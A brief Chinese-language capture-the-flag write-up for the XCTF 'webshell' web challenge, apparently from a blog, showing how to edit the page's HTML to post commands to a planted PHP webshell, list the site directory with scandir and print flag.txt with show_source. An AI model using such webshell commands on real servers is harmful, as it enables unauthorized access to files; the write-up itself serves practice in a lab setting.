XCTF WEB webshell

https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070

版本一

题解:修改HTML代码提交一个shell的变量

变量值是webshell命令

​​​​​​​
       

XCTF WEB webshell_第1张图片

XCTF WEB webshell_第2张图片

提交命令

print_r(scandir(getcwd()));

XCTF WEB webshell_第3张图片

在网站目录下发现了flag.txt

 提交命令

print_r(show_source('flag.txt'));

XCTF WEB webshell_第4张图片

你可能感兴趣的:(XCTF WEB webshell)